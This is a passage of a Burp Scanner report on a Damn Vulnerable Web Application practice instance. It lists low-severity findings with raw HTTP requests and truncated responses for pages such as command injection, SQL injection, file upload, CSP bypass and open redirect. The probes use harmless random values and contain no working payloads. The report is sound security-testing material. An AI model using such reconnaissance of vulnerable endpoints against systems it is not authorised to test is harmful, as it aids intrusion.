User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=677b9b581720fa14a254ac46290cf902
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4153
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
15.36. https://pentest-ground.com:4280/vulnerabilities/captcha/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/captcha/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/captcha/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6673dce764fbffe20cb502b85dd01724
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4701
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
15.37. https://pentest-ground.com:4280/vulnerabilities/csp/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
15.38. https://pentest-ground.com:4280/vulnerabilities/csp/WvEMlU
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/WvEMlU |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/csp/WvEMlU HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 280
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apach
...[SNIP]...
15.39. https://pentest-ground.com:4280/vulnerabilities/csrf/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/csrf/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4af5ee61eab28a6dbbe1ce917fe25f23
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:23 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5359
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
15.40. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/test_credentials.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=70f6e6956d00d19077d4d7074dd5552e
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
15.41. https://pentest-ground.com:4280/vulnerabilities/exec/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d0ba91771b783950c31dcfd0b174fbb8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
15.42. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:08 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4094
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
15.43. https://pentest-ground.com:4280/vulnerabilities/javascript/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/javascript/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=047d8dd2ace9aaf1d3f54dd1c349de44
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:36 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
15.44. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/open_redirect/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f95de080a06d37780795c31df4383fd6
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
15.45. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/info.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/open_redirect/source/info.php?id=2 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4211f230e7d91901f7f1c3880dd3aa6f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4193
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
15.46. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/low.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/open_redirect/source/low.php?redirect=info.php?id=1 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f24117d4e4d0b8e33bc943d70bd65e00
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
location: info.php?id=1
15.47. https://pentest-ground.com:4280/vulnerabilities/sqli/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/sqli/?id=946146&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e7fce7ed667134b8606e163d4a2a33b7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4064
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)</
...[SNIP]...
15.48. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=9f28fa18f337425afc9aa892e78d492e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
15.49. https://pentest-ground.com:4280/vulnerabilities/upload/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=30dfe41b65fb094cfbdac447e96119cd
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryecNMX27PWG2QSiwV
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:13 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
15.50. https://pentest-ground.com:4280/vulnerabilities/view_help.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_help.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/view_help.php?id=brute&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3e80b2e1e73cd41e7284684082f1165
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:12 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4235
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
15.51. https://pentest-ground.com:4280/vulnerabilities/view_source.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/view_source.php?id=brute&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0469bf99ed333ec9d4bed463704811d5
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 6531
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
15.52. https://pentest-ground.com:4280/vulnerabilities/weak_id/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/weak_id/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=816b74549ceec886dd90efed771fc842
